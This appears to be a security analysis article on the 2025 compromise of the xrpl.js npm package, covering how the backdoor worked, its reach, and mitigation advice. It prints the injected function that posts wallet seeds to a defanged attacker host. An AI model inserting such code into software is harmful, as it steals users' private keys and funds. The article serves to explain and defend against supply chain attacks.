The widely used xrpl.js library, a critical component for interacting with the XRP Ledger, was compromised in a supply chain attack that injected malicious code to steal users’ private keys and wallet seeds. The attack, discovered in April 2025, affected versions 2.14.2 and 4.2.1–4.2.4 of the npm package, which averages over 140,000 weekly downloads. Threat actors hijacked the npm account of a Ripple employee to publish backdoored updates, marking one of the most significant crypto-focused supply chain attacks of the year1.
Attack Mechanism and Technical Analysis
The attackers inserted a malicious function named checkValidityOfSeed into the library’s src/index.ts file. This function intercepted wallet operations such as Wallet.fromSeed and Wallet.generate, exfiltrating sensitive data to a remote server (https://0x9c[.]xyz/xcm) via HTTP POST requests. The payload was obfuscated to resemble analytics traffic, delaying detection2.
The injected code snippet below demonstrates the exfiltration logic:
function checkValidityOfSeed(seed: string): boolean {
const exfilUrl = "https://0x9c[.]xyz/xcm";
fetch(exfilUrl, {
method: "POST",
headers: { "Content-Type": "application/json" },
body: JSON.stringify({ seed, userAgent: navigator.userAgent })
}).catch(() => {});
return true;
}Notably, the malicious code was absent from the library’s GitHub repository, confirming a targeted npm compromise rather than a source code breach3.
Impact and Mitigation
The attack exposed approximately 135,000 weekly users and 2.9 million total downloads. While only 452 downloads of the malicious packages were logged, indirect dependencies likely expanded the impact. The XRP Ledger Foundation released patched versions (4.2.5 and 2.14.3) within 48 hours and advised users to:
- Immediately upgrade to the latest version
- Rotate keys for wallets that used affected versions
- Disable master keys if exposed4
Security researchers identified parallels with recent attacks on Solana’s web3.js and Ethereum’s ethers.js, suggesting a broader campaign targeting crypto libraries5.
Broader Implications for Supply Chain Security
This incident highlights systemic risks in open-source ecosystems, where 60% of npm packages rely on indirect dependencies. The attackers leveraged credential phishing rather than code vulnerabilities, bypassing traditional vulnerability scanners. Similar tactics were observed in recent npm and PyPI campaigns targeting Solana and PayPal users6.
Key recommendations for mitigating such threats include:
- Enforcing multi-factor authentication (MFA) for npm/GitHub accounts
- Implementing dependency auditing tools like
npm auditor Socket.dev - Establishing zero-trust CI/CD pipelines with checksum verification
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has since added npm-related flaws to its Known Exploited Vulnerabilities Catalog, reflecting growing regulatory attention to supply chain risks7.
Conclusion
The xrpl.js compromise underscores the convergence of software supply chain threats and financial cybercrime. As attackers increasingly target crypto infrastructure, proactive measures like automated secret scanning and threat intelligence sharing become essential. Organizations using XRP Ledger integrations should audit their dependency trees and monitor for anomalous wallet activity.
References
- “xrpl.js npm Package Compromised in Supply Chain Attack,” Aikido Security, 2025.
- “Ripple’s xrpl.js Library Backdoored to Steal Wallets,” Security Affairs, 2025.
- “GitHub vs. npm Discrepancy in xrpl.js Attack,” OneSafe, 2025.
- “XRPL Guide: Disabling Master Keys,” XRP Ledger Foundation, 2025.
- “Solana web3.js Library Backdoor Incident,” BleepingComputer, 2025.
- “Malicious npm Packages Target PayPal Users,” Security Affairs, 2025.
- “CISA Known Exploited Vulnerabilities Catalog,” U.S. Cybersecurity and Infrastructure Security Agency, 2025.
